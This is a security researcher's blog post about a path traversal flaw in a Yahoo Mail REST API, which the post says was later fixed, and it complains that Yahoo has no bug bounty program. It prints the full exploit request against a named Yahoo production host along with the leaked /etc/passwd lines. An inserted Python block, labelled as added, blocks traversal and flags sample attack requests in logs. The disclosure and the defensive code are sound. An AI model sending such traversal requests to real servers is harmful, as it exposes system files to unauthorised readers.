Yahoo, please start with a Vulnerability Reward Program
Last year I discovered a LFI/Path Traversal vulnerability in a REST API used by Yahoo Mail and I got an automated mail from their mailer. I refused to report more bugs to them because it's boring to talk with bots.
    GET /v2/xframe/../../../../../../../etc/passwd?bc HTTP/1.1
    Host: prod1.rest-notify.msg.yahoo.com

    HTTP/1.1 200 OK
    Connection: close
    Expires: Thu, 15 Apr 2020 20:00:00 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 29676

    root:*:0:0:Charlie &:/root:/usr/local/bin/bash
    toor:*:0:0:Bourne-again Superuser:/root:/bin/sh
    daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
    operator:*:2:5:System &:/:/sbin/nologin
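A defensive check for the traversal shown above, added here as an example and not code from Yahoo or from the original post: it maps a /v2/xframe/ request path onto a constructed web root, rejects anything that normalises outside that root (including percent-encoded dots), and runs the same check over a few constructed access-log lines to flag attempts. WEB_ROOT, the log lines and the function names are assumptions.

```python
import posixpath
from typing import List, Optional
from urllib.parse import unquote, urlsplit

ROUTE_PREFIX = "/v2/xframe/"
# Constructed: the directory the /v2/xframe/ route is allowed to serve from.
WEB_ROOT = "/srv/app/public/xframe"


def resolve_under_root(url_path: str, root: str = WEB_ROOT) -> Optional[str]:
    """Map a /v2/xframe/ request target to a filesystem path.

    Returns None when the target escapes `root` (or is otherwise invalid),
    so the handler can answer 404/403 instead of opening the file.
    """
    path = unquote(urlsplit(url_path).path)  # drop "?bc", decode %2e etc.
    if "\x00" in path or not path.startswith(ROUTE_PREFIX):
        return None
    rel = path[len(ROUTE_PREFIX):]
    # normpath collapses every "..", so the result is where the OS would go
    candidate = posixpath.normpath(posixpath.join(root, rel))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed access-log lines for a detection pass (not real server logs).
SAMPLE_LOG = """\
GET /v2/xframe/../../../../../../../etc/passwd?bc HTTP/1.1 200
GET /v2/xframe/widget.html HTTP/1.1 200
GET /v2/xframe/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 200
GET /v2/xframe/js/../app.js HTTP/1.1 200
"""


def rejected_targets(log: str) -> List[str]:
    """Return the request targets in `log` that resolve_under_root rejects."""
    hits = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        if resolve_under_root(parts[1]) is None:
            hits.append(parts[1])
    return hits


if __name__ == "__main__":
    for target in rejected_targets(SAMPLE_LOG):
        print("traversal attempt:", target)
```

A request such as /v2/xframe/js/../app.js still resolves inside the root and is served; only paths that leave the root are refused.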
Some minutes later I got an automated reply from Yahoo Security Contact (security at yahoo-inc.com)
Thank you for contacting Yahoo!. These issues have been passed
along to the correct teams to investigate. Should a fix be required,
we will again contact you and ask that you see the issues as resolved.
Yahoo! Security Contact
Days later the issue was fixed. But no more replies from them!
Yahoo, please start with a Vulnerability Reward Program and get in touch with the community - before it's too late.